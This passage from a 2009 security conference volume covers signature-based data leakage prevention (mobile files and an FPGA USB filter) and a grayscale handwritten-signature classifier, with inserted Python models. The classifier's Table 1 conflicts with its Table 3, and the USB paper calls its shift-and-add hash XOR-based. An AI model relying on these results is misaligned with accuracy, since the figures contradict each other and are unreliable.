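        window_size = max(-(-file_len // max_windows), SIG_LEN)   # ceiling division
        window_number = max(1, file_len // window_size)
    return window_size, window_number


def select_signatures(data, avg_len, seed=None):
    """Return [(offset, signature_bytes)] for one file at creation time."""
    rng = random.Random(seed)
    if len(data) < SIG_LEN:
        return []
    if len(data) < SMALL_FILE:
        off = rng.randrange(0, len(data) - SIG_LEN + 1)   # one random location
        return [(off, data[off:off + SIG_LEN])]
    window_size, window_number = window_layout(len(data), avg_len)
    per_window = REFERENCE_TABLE[min(window_number, MAX_WINDOWS)]
    sigs = []
    for w in range(window_number):
        start = w * window_size
        # The last window absorbs any tail shorter than a full window.
        end = len(data) if w == window_number - 1 else start + window_size
        for _ in range(per_window):
            off = rng.randrange(start, end - SIG_LEN + 1)
            sigs.append((off, data[off:off + SIG_LEN]))
    return sigs


def check_block(block, signature_set):
    """True if any stored signature occurs in the block."""
    return any(sig in block for sig in signature_set)


def transfer(data, signature_set, block_size=16):
    """Copy to external storage block by block. Stops at the first matching
    block and returns (completed, bytes_already_sent); per the paper the
    already-sent bytes must then be erased."""
    sent, carry = 0, b""
    for i in range(0, len(data), block_size):
        block = data[i:i + block_size]
        # Carry the tail of the previous block so a signature straddling a
        # block boundary is still detected (a purely per-block compare misses it).
        if check_block(carry + block, signature_set):
            return False, sent
        sent += len(block)
        carry = block[-(SIG_LEN - 1):]
    return True, sent
```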
5 Conclusions

This paper proposed dynamic signature selection to prevent illegal outflow from a mobile device. The method is based on sampling by equal distribution: a signature is selected equally in each window over the whole extent of the file. To do this, the whole extent is divided into extents of the window size, and the length of the signature is chosen as the smallest that still distinguishes the file from other files. Due to the randomness of signature selection within a window, unauthorized access to any part of the file is detected and prevented efficiently. The window size is carefully decided, according to the distribution of file lengths in the mobile device, to avoid an extreme increase in the number of signatures; and to prevent excessive growth of the number of windows, the window size is enlarged up to a threshold value. At signature extraction time, the complex runtime operations for calculating the number of selected signatures are removed by a lookup in a pre-calculated table. With the randomness and equal distribution of signature selection, exactly the transferred block that carries sensitive information is blocked. With the decision strategy for the length and number of windows, the signatures to manage can be minimized. With the reduced runtime computational overhead, the method can run on a device of lower performance than a PC; a benefit of the proposed method is that it can serve as a prevention mechanism on a low-performance mobile device. We plan to extend this functionality further in order to reduce the burden on the mobile device, for example with minimal selection, and to study how the decision of which file to extract signatures from can be made automatically.
Hardware Based Data Inspection for USB Data Leakage Prevention

DongHo Kang, BoHeung Jung, and KiYoung Kim
Infra Protection Research Team, Electronics and Telecommunications Research Institute, Daejeon, Korea
{dhkang, bhjung, kykim}@etri.re.kr
Abstract. The current Internet threat environment is characterized by an increase in data theft, data leakage, and the creation of targeted malicious code for the purpose of stealing confidential information that can be used for financial gain. This paper focuses on protecting sensitive files from being accidentally leaked out of a system through unauthorized USB devices. We propose a hardware architecture guaranteeing USB-based data leakage prevention. The prototype board, connected to a USB host system, intercepts and analyzes USB data transferred to a USB device. This approach provides flexible security enforcement policies, including alerting and real-time blocking.

Keywords: Data leakage prevention, Security, Confidentiality, USB.
1 Introduction

We are faced with the data leakage problem arising from data transfer over wired USB connectivity. USB creates a method of attaching and accessing peripheral devices that reduces overall cost, simplifies attachment and configuration from the end-user perspective, and solves several technical issues associated with old-style peripherals. However, it can also be a tremendous source of data leakage through uncontrolled access. USB host devices can transfer their sensitive data through USB interfaces: for example, they can copy data from their hard drive to a CD/DVD burner or a USB storage device, a wireless USB network dongle lets notebooks and desktops communicate wirelessly with other devices through a USB interface, and a host system can print to a printer over a USB interface. For these reasons, USB connectivity on notebooks and desktops increases the risk of data leakage through USB data transfers. USB data leakage prevention technologies have existed for some time. For instance, USB monitoring tools running on a host device inspect the USB data transferred to USB client devices and control USB drive insertion and removal. Other tools provide data encryption to preserve important data. In theory, a host system is secure if all necessary DLP mechanisms are in place. In reality, however, those technologies may not completely prevent data leakage by inside intruders, and most of those tools consume the limited resources of the system. A DLP solution should be fast enough to catch different types of data leakage before data is lost. This research provides a unique framework for preserving sensitive data on a USB host system. The FPGA-based DLP board also brings resource-saving and speed benefits compared to USB monitoring tools running on a host device.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 57–63, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Architecture

The USB DLP architecture with its two components is shown in Figure 1. It consists of the host system, which runs a USB DLP application and holds the sensitive data, and the USB DLP board, which analyzes USB data. The host system connects to the USB DLP board over the USB interface. The USB DLP board sits between the host system and USB devices such as a USB memory device, a USB network dongle, a USB CD/DVD burner and a USB printer. The FPGA-based board is designed for string comparison using a hash-based pattern matching algorithm. The proposed architecture consists of the Signature manager on the host system and the USB DLP board. The Signature manager is software executing on the host system that generates signatures and enforces them on the USB DLP board. The USB DLP board is responsible for receiving USB data from the host system, parsing and analyzing the data, and then determining whether the data is sensitive. If it is not sensitive, the USB DLP board transfers the data to the USB device.
Fig. 1. The USB DLP Architecture
3 Design

As described in the introduction, the proposed architecture provides a unique approach for protecting sensitive or confidential data on a system whose uncontrolled USB data transfers increase the risk of data leakage. The host system provides two interfaces: policy is transferred to the USB DLP board through a serial port, and a USB port is the interface for USB data transmission. The architecture consists of the signature management application on the host system, which holds the protected data, and the USB DLP board.
Fig. 2. The USB DLP Structure
3.1 Signature Management Application

The Signature Management application consists of the Signature manager, the pattern sampler and the Signature distributer for signature generation and enforcement, and the event recorder for handling alert messages. The Signature manager receives the list of sensitive files through a GUI. For signature generation, the Signature manager extracts only multiple strings from the text of each sensitive file. The size of an extracted string is defined in 8-byte, 16-byte or 24-byte units for the pattern matching engine on the FPGA. Which part of a file is extracted is defined through the GUI. To enforce the security policy in hardware, the Signature management application proceeds in three steps. First, a 16-byte or 24-byte signature is divided into 8-byte units. Next, a hash function generates from each 8-byte string the memory address at which that string is stored in the signature memory. The hash function performs XOR operations, so it is easy and fast to calculate. The following shows the hash function:

H = ((C_n << n-1) + (C_{n-1} << n-2) + … + (C_2 << 1) + C_1) << 3

If a hash collision occurs, the Signature manager regenerates a signature from the file until it is collision-free. In the last step, the signature distributer transfers the policy file, including the list of extracted signatures, to the USB DLP board through a serial port.
Fig. 3. The Hash function
Eventually the signature extracted from a sensitive file is placed in the signature memory on the FPGA chip. The security mechanism uses a policy file to determine whether to pass or drop USB data on the USB DLP board. A policy file consists of a set of rules, where a rule is composed of the memory address at which the signature is stored, the signature, the signature length, and the action to be performed by the USB DLP board when USB data is sensitive.

3.2 USB DLP Board

The USB DLP board is designed for wire-speed data forwarding and data analysis to prevent data leakage. It has three interfaces: two USB interfaces for USB data transmission and an Ethernet interface for policy and alert message transmission. The FPGA chip receives USB data through a USB port and a UTMI transceiver. If the USB data is not sensitive, it is transferred to the USB device attached to the USB DLP board. The Search Engine Block (SEB) on the FPGA chip determines whether the data is confidential or not. The SEB is composed of three Block RAMs. RAMB1 is a memory with 4096 entries for storing 8-byte signatures. RAMB2 is a memory with 4096 entries for policies. The FIFO memory is used to check whether the next 8-byte string matches in a row after the first or second 8-byte USB data unit has matched an 8-byte signature. The following shows how a 32-byte string is stored in the RAMB1 and RAMB2 memories.

Fig. 4. Search Engine Block
Fig. 5. Policy Enforcement
The SEB performs string comparison using a Rabin-Karp based algorithm. In a preprocessing phase, the Hash Function Block (HFB) calculates the hash value of the incoming 8-byte data at byte granularity. For a 16-byte or 24-byte pattern, if the string in the incoming data matches the signature in the memory entry pointed to by the calculated hash value, the SEB checks whether the next patterns match as well. If all reconstructed patterns match the incoming data, an alert message is generated according to the related policy in RAMB2.
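As an added example (not the paper's or the board's code), the following Python models the signature pipeline of Sections 3.1 and 3.2: splitting a 16- or 24-byte signature into 8-byte units, the shift-and-add hash from Section 3.1 used as the address into a 4096-entry signature memory, collision detection at install time, and the SEB scan of outgoing data with the chained check of consecutive units. Assumed, because the paper does not state them: the entry index is the hash divided by 8 (the trailing << 3) reduced modulo 4096, the action name "drop", and the sample signatures and data, which are constructed.

```python
"""Added example (not the paper's or the board's code): a software model of the
signature memory (RAMB1/RAMB2) and the Search Engine Block scan."""

TABLE_ENTRIES = 4096   # RAMB1 and RAMB2 hold 4096 entries each (Section 3.2)
UNIT = 8               # signature unit length in bytes


def unit_hash(unit):
    """H = ((C_n << n-1) + (C_{n-1} << n-2) + ... + (C_2 << 1) + C_1) << 3
    for one unit, C_1 being its first byte and C_n its last (Section 3.1)."""
    h = 0
    for i, c in enumerate(unit, start=1):
        h += c << (i - 1)
    return h << 3


def unit_address(unit):
    """Assumption: the trailing << 3 yields a byte address into a memory of
    8-byte entries, so the entry index is H / 8 reduced to the table size."""
    return (unit_hash(unit) >> 3) % TABLE_ENTRIES


def split_units(signature):
    """Step 1 of Section 3.1: a 16- or 24-byte signature is divided into
    8-byte units (an 8-byte signature is a single unit)."""
    if len(signature) not in (8, 16, 24):
        raise ValueError("signature must be 8, 16 or 24 bytes")
    return [signature[i:i + UNIT] for i in range(0, len(signature), UNIT)]


class SignatureMemory:
    """RAMB1 (address -> 8-byte unit) and RAMB2 (address -> rule)."""

    def __init__(self):
        self.units = {}
        self.rules = {}   # address -> (signature id, unit index, unit count, action)

    def add(self, sig_id, signature, action="drop"):
        """Install one signature. Returns False on a hash collision (an occupied
        address holding a different unit); the paper's Signature manager then
        regenerates a signature from the file instead of installing this one."""
        units = split_units(signature)
        addrs = [unit_address(u) for u in units]
        if any(a in self.units and self.units[a] != u for a, u in zip(addrs, units)):
            return False
        for idx, (a, u) in enumerate(zip(addrs, units)):
            self.units[a] = u
            self.rules[a] = (sig_id, idx, len(units), action)
        return True

    def scan(self, data):
        """SEB model: hash every 8-byte window of the outgoing data at byte
        granularity; when the first unit of a signature matches, the following
        units must match back to back (the FIFO check). Returns
        [(offset, signature id, action)] for complete matches only."""
        hits = []
        for off in range(len(data) - UNIT + 1):
            unit = data[off:off + UNIT]
            addr = unit_address(unit)
            if self.units.get(addr) != unit:
                continue
            sig_id, idx, count, action = self.rules[addr]
            if idx != 0:
                continue                      # only a first unit opens a match
            for k in range(1, count):
                nxt = data[off + k * UNIT:off + (k + 1) * UNIT]
                naddr = unit_address(nxt)
                if self.units.get(naddr) != nxt or self.rules[naddr][:3] != (sig_id, k, count):
                    break                     # chain broken: partial match, no alert
            else:
                hits.append((off, sig_id, action))
        return hits
```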
4 Implementation

We have developed the USB DLP prototype. The USB DLP board is based on a Virtex-5 FPGA and has a PowerPC 440 RISC CPU. The FPGA logic of the USB DLP board is implemented in Verilog HDL, which is best suited for wire-speed data processing. We also employed inline mode for effective response: the USB DLP board intercepts USB data and filters out sensitive data before it reaches a USB device.
Fig. 6. USB DLP Prototype
5 Conclusion

In this paper we designed the USB DLP architecture, which performs wire-speed data processing and data leakage prevention, and implemented the prototype in FPGA-based reconfigurable hardware that supports more efficient prevention. It has the advantage of supporting an effective response by using the inline monitoring technique. However, it is difficult to create a USB DLP architecture that prevents all possible types of USB data leakage. To develop a better system, the current prototype requires an automatic data classification technique for accurate signature extraction, and we need more experimentation in a real environment to resolve problems found in the verification of the implemented system.
Grayscale Image Classification Using Supervised Chromosome Clustering

Debnath Bhattacharyya1, Poulami Das1, Samir Kumar Bandyopadhyay2, and Tai-hoon Kim3
1 Computer Science and Engineering Department, Heritage Institute of Technology, Kolkata, India {debnathb,dasp88}@gmail.com
2 Department of Computer Science and Engineering, University of Calcutta, Kolkata, India [email protected]
3 Hannam University, Daejeon-306791, Republic of Korea [email protected]
Abstract. In this paper we propose handwritten signature classification using a supervised chromosome clustering technique. Due to the time-variant nature of human handwriting, a set of one hundred sample handwritten signatures is first collected from the user or individual in the form of same-sized grayscale images. These grayscale handwritten signature images are used as the training set in our classification algorithm. Our proposed algorithm then decides whether a future incoming handwritten signature of an individual can be a member of the training set or not. In this paper, distance and similarity play an important role: the greater the dissimilarity measure or distance of the genes, the more dissimilar the two chromosomes are.

Keywords: Clustering, pattern recognition, grayscale, chromosome and genes.
1 Introduction

In general, we are considering cluster, class or group analysis in this paper. In cluster analysis [1], the terms cluster, group, and class have been used in an essentially intuitive manner without a uniform definition. Everitt suggested [2] that if using a term such as cluster produces an answer of value to the investigators, then that is all that is required. Generally, the common sense of a cluster will combine various plausible criteria and require [3], for example, all objects in a cluster to
a. share the same or closely related properties;
b. show small mutual distances or dissimilarities;
c. have "contacts" or "relations" with at least one other object in the group; or
d. be clearly distinguishable from the complement, i.e., the rest of the objects in the data set.
Carmichael et al. also suggested [4] that the set contains clusters of points if the distribution of the points meets the following conditions:
a. There are continuous and relatively densely populated regions of the space.
b. These are surrounded by continuous and relatively empty regions of the space.
In reality, however, the above two conditions or rules are violated frequently. Data clustering (or just clustering), also called cluster analysis, segmentation analysis, taxonomy analysis, or unsupervised classification, is a method of creating groups of objects, or clusters, in such a way that objects in one cluster are very similar and objects in different clusters are quite distinct. Data clustering is often confused with classification, in which objects are assigned to predefined classes. In data clustering, the classes are also to be defined [1]. To elaborate the concept a little, we consider the following example: a gene expression data set can be represented by a real-valued expression matrix

where n is the number of genes, d is the number of experimental conditions or samples, and $x_{ij}$ is the measured expression level of gene i in sample j. Since the original gene expression matrix contains noise, missing values, and systematic variations, preprocessing is normally required before cluster analysis can be performed. We consider lossless grayscale images to avoid noise to some extent; however, noise removal is a separate problem altogether. Gene expression data can be clustered in two ways. One way is to group genes with similar expression patterns, i.e., clustering the rows of the expression matrix D. Another way is to group different samples on the basis of corresponding expression profiles, that is, clustering the columns of the expression matrix D. Image segmentation is the decomposition of a gray level or color image into homogeneous tiles [5]. In image segmentation, cluster analysis is used to detect borders of objects in an image. Clustering constitutes an essential component of so-called data mining, a process of exploring and analyzing large amounts of data in order to discover useful information [6]. Clustering is also a fundamental problem in the pattern recognition literature. Fig. 1 gives a schematic list of various data-mining tasks and indicates the role of clustering in data mining.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 64–71, 2009. © Springer-Verlag Berlin Heidelberg 2009
Fig. 1. Data-mining tasks
2 Previous Works

The clustering problem has been addressed extensively, although there is no uniform definition of data clustering and there may never be one [7, 8, 9]. Roughly speaking, by data clustering we mean that for a given set of data points and a similarity measure, we regroup the data such that data points in the same group are similar and data points in different groups are dissimilar. Obviously, this type of problem is encountered in many applications, such as text mining, gene expression, customer segmentation, and image processing, to name just a few. As a fundamental pattern recognition problem, a well-designed clustering algorithm usually involves the following four design phases: data representation, modeling, optimization, and validation [16]. Fig. 2 shows the schematic diagram of those design phases. A new genetic search strategy involving chromosome differentiation into two classes and a restricted form of crossover operation is defined in [10]. Its application to multi-dimensional pattern recognition problems is studied, and the superiority of the classifier is established for four sets of different artificial and real-life data. The concept of chromosome differentiation, commonly witnessed in nature as male and female sexes, is incorporated into genetic algorithms with variable-length strings for designing a nonparametric classification methodology. Its significance in partitioning different land-cover regions from satellite images with complex/overlapping class boundaries is demonstrated. The classifier is able to automatically evolve the appropriate number of hyperplanes for efficiently modeling any kind of class boundary. The merits of the system over related ones are established through several quantitative measures [11].

Fig. 2. Process of data clustering
3 Our Work

In this paper we propose a distance-based classifier algorithm that classifies a handwritten signature image. For that, we first take a set of handwritten signature images after proper processing.

Input: N training image(s), 1 test image
Output: Test image, FIT or UNFIT
Procedure HSC() [Handwritten Signature Classifier]
{
1. Declare N 2D Training Arrays and one 2D Test Array of size (w, h), where w = width and h = height of each image (the image size is the same for all images). Declare single-dimensional vector arrays x1, x2, …, xn, each of size k = w × h, where n is the number of training images, and one test vector array y of size w × h.
2. For i = 1 to w
       For j = 1 to h
           Read pixel (i, j) from each image and assign its gray value to the corresponding 2D Training Array
           Read Test_image_pixel (i, j) from the test image and assign its gray value to the 2D Test Array
       End For
   End For
3. For i = 1 to w
       For j = 1 to h
           Populate each single-dimensional vector array from the corresponding 2D Training Array, x1(1…k), …, xn(1…k), and populate y(1…k) from the 2D Test Array
       End For
   End For
4. Fitness of y(1…k), where J is the number of x arrays:
   For j = 1 to J
       $D_j(X, Y) = \sqrt{\sum_{i=1}^{k} (x_{ji} - y_i)^2}$
       If $D_j(X, Y) = 0$ then the test image (signature of the user) is under the user domain
       Else the test image is not matched (unauthorized user)
   End For
}

All the grayscale training images are scaled to a specific, common size [12] and passed through the thinning algorithm [13]. Then each pixel value is read and stored at the corresponding location of the training 2D array, for all the images, so N 2D arrays are generated. These 2D arrays are converted to single-dimensional arrays. Now we can consider each single-dimensional array as a chromosome, where each element of the array holds a specific characteristic and can be treated as a gene responsible for the character (colour); that is, the gray intensity value can be 0 to 255. In human beings, so far 32000 genes have been identified. Thus, in a large problem space, a huge number of pixels needs to be handled. The time complexity of 1:1 checking is O(N^3) in a large problem space. This is a bit slow, but the algorithm gives its output in polynomial time. This is very common, because the algorithm(s) have to handle large sets of image data [14]. The fitness test for the test image is the distance computation of step 4, where x and y are the single-dimensional arrays and the distance (d) between x and y is calculated. If there is no measure of similarity or dissimilarity between pairs of data points, then no meaningful cluster analysis is possible.
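As an added example (not the authors' code), the following Python implements steps 3 and 4 of HSC (flattening a 2D gray-value array into a chromosome and the gene-to-gene distance) and runs it on the five training chromosomes of Table 2, given here as constructed 3×4 images. The test chromosome is constructed equal to training chromosome 3, which the text says matches exactly, and this reproduces the distance column of Table 3 (441.67, 255, 0, 255, 255); the optional tolerance argument goes beyond the paper's exact-zero rule.

```python
"""Added example (not the authors' code): the HSC classifier of Section 3
applied to the 12-gene training chromosomes of Table 2."""
import math


def image_to_chromosome(image):
    """Step 3: flatten a 2D array of gray values (rows of pixels) into a
    single-dimensional chromosome; each element is one gene (0..255)."""
    return [pixel for row in image for pixel in row]


def distance(x, y):
    """Step 4: D(X, Y) = sqrt(sum_i (x_i - y_i)^2), computed gene to gene."""
    if len(x) != len(y):
        raise ValueError("chromosomes must have the same number of genes")
    return math.sqrt(sum((xi - yi) ** 2 for xi, yi in zip(x, y)))


def classify(training, test, tolerance=0.0):
    """Return (fit, distances). The paper's rule is fit only at distance 0;
    a tolerance (assumed extension) admits near matches, since real
    signatures vary from sample to sample."""
    distances = [distance(x, test) for x in training]
    return any(d <= tolerance for d in distances), distances


# Table 2 training chromosomes (user domain), genes 1..12 laid out as
# constructed 3x4 images so that flattening reproduces the table rows.
TRAINING_IMAGES = [
    [[0, 255, 255, 0], [0, 0, 0, 255], [0, 0, 255, 255]],      # chromosome 1
    [[255, 0, 255, 0], [0, 0, 0, 255], [0, 0, 255, 255]],      # chromosome 2
    [[255, 0, 255, 255], [0, 0, 0, 255], [0, 0, 255, 255]],    # chromosome 3
    [[0, 0, 255, 255], [0, 0, 0, 255], [0, 0, 255, 255]],      # chromosome 4
    [[255, 0, 255, 255], [255, 0, 0, 255], [0, 0, 255, 255]],  # chromosome 5
]
# Constructed test image, equal to training chromosome 3 (the text states that
# chromosome 3 matches the test chromosome exactly).
TEST_IMAGE = [[255, 0, 255, 255], [0, 0, 0, 255], [0, 0, 255, 255]]

TRAINING = [image_to_chromosome(img) for img in TRAINING_IMAGES]
TEST = image_to_chromosome(TEST_IMAGE)

if __name__ == "__main__":
    fit, dists = classify(TRAINING, TEST)
    for n, d in enumerate(dists, start=1):
        print(f"training chromosome {n}: distance {d:.2f}")
    print("FIT" if fit else "UNFIT")
```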
4 Result

The result of a test run is shown in Table 1, Table 2 and Table 3. The distance value is calculated between each training chromosome and the test chromosome, gene to gene (Table 3).

Table 1. Test Chromosome

                                       Genes
                    1    2    3    4    5    6    7    8    9   10   11   12
Test Chromosome   255    0  255  255    0    0  255    0  255    0    0  255

Table 2. A set of Training Chromosomes (user domain)

Training                               Genes
Chromosome #    1    2    3    4    5    6    7    8    9   10   11   12
1               0  255  255    0    0    0    0  255    0    0  255  255
2             255    0  255    0    0    0    0  255    0    0  255  255
3             255    0  255  255    0    0    0  255    0    0  255  255
4               0    0  255  255    0    0    0  255    0    0  255  255
5             255    0  255  255  255    0    0  255    0    0  255  255

Table 3. Result set

Training                               Genes                                  Distance
Chromosome #    1    2    3    4    5    6    7    8    9   10   11   12      values
1               0  255  255    0    0    0    0  255    0    0  255  255      441.67
2             255    0  255    0    0    0    0  255    0    0  255  255      255
3             255    0  255  255    0    0    0  255    0    0  255  255      0
4               0    0  255  255    0    0    0  255    0    0  255  255      255
5             255    0  255  255  255    0    0  255    0    0  255  255      255

In this example, training chromosome 3 completely matches the test chromosome, with distance value 0: the highest, i.e. complete, match corresponds to a membership value of 0, and a higher distance value means a less fit membership value. A figurative analysis is shown in Fig. 3. Initially, N training images are taken; then the output is shown step by step. The following rules have been applied in this work:

a. $D(X, Y) \ge 0$   (i)
b. $D(X, X) = 0$   (ii)
c. $D(Y, Y) = 0$   (iii)

where, in equations (i), (ii) and (iii), D = distance and X and Y are chromosomes.
[Fig. 3 panels: N number of Grayscale Training Images (Signature-1, Signature-2, …, Signature-(N-1), Signature-N); Image to 2D Training Array; 2D Training Array to Single Dimensional Array (Chromosome); Gene to gene distance calculation; Test Chromosome; Calculated Distance (Highest Fitness here in this example)]

Fig. 3. One such instance of algorithm output
5 Conclusion

A new approach, gene-to-gene differentiation between chromosomes, has been described. Its related application has also been developed and tested in this paper. Pattern classification in a large space has also been tested. An improvement is also marked in comparison to the previously proposed works [15]. We have started to incorporate some fuzzy rules into this algorithm.
Acknowledgement

This work was supported by the Security Engineering Research Center, granted by the Korea Ministry of Knowledge Economy. This work was successfully completed with the active support of Prof. Tai-hoon Kim, Hannam University, Republic of Korea.
References

1. Gan, G., Ma, C., Wu, J.: Data Clustering: Theory, Algorithms and Applications. ASA-SIAM Series on Statistics and Applied Probability. SIAM, Philadelphia (2007)
2. Everitt, B.: Cluster Analysis, 3rd edn. Halsted Press, New York (1993)
3. Bock, H.: Probabilistic aspects in cluster analysis. In: Conceptual and Numerical Analysis of Data, Augsburg, FRG, pp. 12–44. Springer, Heidelberg (1989)
4. Carmichael, J., George, J.A., Julius, R.: Finding natural clusters. Systematic Zoology 17(2), 144–150 (1968)
5. Comaniciu, D., Meer, P.: Mean shift: A robust approach toward feature space analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence 24(5), 603–619 (2002)
6. Berry, M., Linoff, G.: Mastering Data Mining. John Wiley and Sons, New York (2000)
7. Estivill-Castro, V.: Why so many clustering algorithms: a position paper. ACM SIGKDD Explorations Newsletter 4(1), 65–75 (2002)
8. Dubes, R.: How many clusters are best? An experiment. Pattern Recognition 20(6), 645–663 (1987)
9. Fraley, C., Raftery, A.: How many clusters? Which clustering method? Answers via model-based cluster analysis. The Computer Journal 41(8), 578–588 (1998)
10. Bandyopadhyay, S., Pal, S.K.: Pattern Classification with Genetic Algorithms: Incorporation of Chromosome Differentiation. Pattern Recognition Letters 18, 119–131 (1997)
11. Bandyopadhyay, S., Pal, S.K.: Pixel Classification Using Variable String Genetic Algorithms with Chromosome Differentiation. IEEE Transactions on Geoscience and Remote Sensing 39(2), 303–308 (2001)
12. Bhattacharyya, D., Bandyopadhyay, S.K., Chaudhury, D.: Handwritten Signature Authentication Scheme using Integrated Statistical Analysis of Bi-Color Images. In: IEEE ICCSA 2007 Conference, Kuala Lumpur, Malaysia, August 26-29, pp. 72–77 (2007)
13. Bandyopadhyay, S.K., Bhattacharyya, D., Das, P.: Handwritten Signature Verification System using Morphological Image Analysis. In: CATA 2007 International Conference, A publication of International Society for Computers and their Applications, Honolulu, Hawaii, USA, March 28-30, pp. 112–117 (2007)
14. Bandyopadhyay, S.K., Bhattacharyya, D., Das, P., Debnath, D.: Handwritten Signature Authentication using Statistical Estimation. In: IEEE-CS MUE 2008 Conference, Busan, Korea, April 24-27, pp. 77–82 (2008)
15. Das, P., Bhattacharyya, D., Bandyopadhyay, S.K., Kim, T.-h.: Person Identification through IRIS Recognition. IJSIA - International Journal of Security and Its Applications, A publication of Science and Engineering Research Support Center 3(1), 129–148 (2009)
16. Buhmann, J.: Data clustering and learning. In: The Handbook of Brain Theory and Neural Networks, pp. 308–312. MIT Press, Cambridge (2003)
Towards the Integration of Security Aspects into System Development Using Collaboration-Oriented Models
Linda Ariani Gunawan, Peter Herrmann, and Frank Alexander Kraemer
Department of Telematics, Norwegian University of Science and Technology (NTNU), Trondheim, Norway
{gunawan,herrmann,kraemer}@item.ntnu.no
Abstract. Security, as an important feature of system design, should be taken into account early in the development of systems. We propose an extension of the SPACE engineering method in order to integrate security aspects into the system design and implementation phases. The integration of security mechanisms is facilitated by collaborations. Functional system specifications are represented by collaboration-oriented models which describe functionalities reaching over different physical components in one model. Countermeasures are also modeled by collaborations since security mechanisms are often collaborative structures themselves. Our approach includes an asset-oriented security analysis on the collaboration-oriented models in order to determine the level of protection needed. We illustrate our approach by the example of an e-sale system.
1 Introduction
Developing security-aware distributed systems is a non-trivial task: Not only do we have to guarantee the correct execution of a system provided by cooperating distributed entities with respect to the desired functionalities of the application. We must also take into account the protection of the system against security attacks by malicious entities. The consideration of these security aspects should be integrated as early as possible into the development process, since adding security later in an ad-hoc manner increases the probability of overlooking vulnerabilities contained in the system implementation [1]. For that reason, we propose a model-driven, security-aware development method based on collaborative, reusable building blocks. Application logic as well as security mechanisms are expressed by means of functionally complete UML models that can be analyzed in separation. Once consistent and adequately protected, these models can be stored as building blocks in a library. This not only reduces the development time, since proven solutions can be reused, but also facilitates the cooperation between application developers and security experts, since both parties contribute their knowledge in the form of self-contained, encapsulated units that are easy to combine, as shown in [2] for the domain of trusted systems.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 72–85, 2009. © Springer-Verlag Berlin Heidelberg 2009
Our proposed method is an extension of the engineering method SPACE [3,4,5] that supports the design and implementation of reactive systems in general. In this method, system specifications are expressed in the form of UML 2.x activities, enabling the composition of systems from reusable building blocks. By means of model transformation and code generation, the composed system specifications can be implemented automatically, so that engineers only have to work on the level of UML activities. We extend the SPACE method by performing a series of iterated steps of security analysis which adheres to the standard ISO/IEC Common Criteria [6]. During the analysis, security threats, attacks and risks are considered in order to design suitable protection mechanisms and integrate them into the functional specification of the system. To be effective, most security mechanisms require the correct and coordinated collaboration of several entities. For instance, an asymmetric encryption mechanism consists at least of a transmitter encrypting a message with the public key of the receiver and the receiver itself, which decrypts the message with the corresponding private key. Furthermore, entities like a certification authority issuing certificates attesting that a public key really belongs to a certain party are part of the security mechanism as well. For that reason, we also use collaboration models to specify countermeasures. The different stakeholders of security mechanisms and their corresponding behaviors may be expressed by UML activities which can easily be combined with other collaboration models describing the systems to be protected.
2 The Basic Development Method
The structure of the e-sale system is modeled by a collaboration, as shown in Fig. 1. It consists of two collaboration roles, customer and merchant, which denote the participants of the system. To make a purchase, these roles have to collaborate with each other, i.e., execute some joint behavior. This behavior is captured by the two collaboration uses o:Order and p:Payment, denoted by ellipses. The dashed lines are the role bindings specifying that the customer is the buyer during the order, and the payer during the payment. Vice versa, the merchant acts as a seller and a payee, respectively. While the collaboration in Fig. 1 specifies from which services the complete system is composed, the detailed dependencies between order and payment are not visible. For this purpose, we use the UML activity diagram shown in Fig. 2.
[Figure 1 is not reproduced in this text version. It shows the collaboration «system» e-Sale with the roles customer and merchant, the collaboration uses o:Order and p:Payment, and the role bindings customer-buyer/payer and merchant-seller/payee.]
Fig. 1. UML collaboration for the e-Sale system
[Figure 2 is not reproduced in this text version. It shows the «system» e-Sale activity with the partitions customer and merchant; the call behavior actions o:Order (pins start, products: List, buy: List, finish: Order) and p:Payment (pins start: Invoice, pay, success, failed); the local operations select products, get sCart, create invoice, display invoice and confirm, display "success", display "failed", confirm success and confirm failed; and, to the right, the ESMs «esm» Order (states started, selecting, ordering; transitions start/, /products, buy/, /products+buy, /finish) and «esm» Payment (states started, billed, validating; transitions start/, /invoice, pay/, /invoice+pay, /success, /failed).]
Fig. 2. The behavior of the e-Sale system
Each participant in the system is represented by its own activity partition. The order and payment services from Fig. 1 are represented by the call behavior actions o:Order and p:Payment, referring to activity diagrams that define their detailed internal behavior, as we will see later. In contrast to the collaboration uses from Fig. 1, call behavior actions have pins at their borders which denote specific events that we can use for their composition. In order to understand the high-level interface behavior of the call behavior actions without looking into their internals, they are accompanied by special external state machines (ESMs, [5]), shown to the right in Fig. 2. They define the externally observable behavior at the pins of a call behavior action. The e-sale system starts at the initial node on the customer side by triggering o:Order via its start pin. From the ESM for the order collaboration shown at the upper right in Fig. 2, we see that after a start, we have to be prepared for the arrival of the catalogue of products. The ESM allows that the response to the catalogue in the form of a buy list either happens with a delay (for example after the customer selects items via a user interface) or immediately. In the former case, the ESM declares the transition /products, leading into state selecting, from which transition buy/ leads into state ordering. For the system as specified in Fig. 2, we assume that the order is not delayed, but directly computed by the operations select products and get sCart. Since these operations are executed locally, they are processed within the same run-to-completion step. This immediate return via buy is allowed by the ESM with the transition /products+buy. Note that products and buy are streaming parameter pins denoted in black, meaning that they can pass tokens while the collaboration is active.
The o:Order collaboration will eventually finish on the merchant’s side via finish. This triggers the local operation create Invoice, which in turn triggers the start of the payment collaboration. From the ESM for the payment collaboration shown at the bottom right in Fig. 2, we see that this collaboration passes the invoice to the customer, who confirms the payment via pay. Since payment information may be invalid, this collaboration may terminate in two different ways, either via success or failed, upon which corresponding actions are invoked on the merchant and customer sides.
3 The Security-Enhanced Method
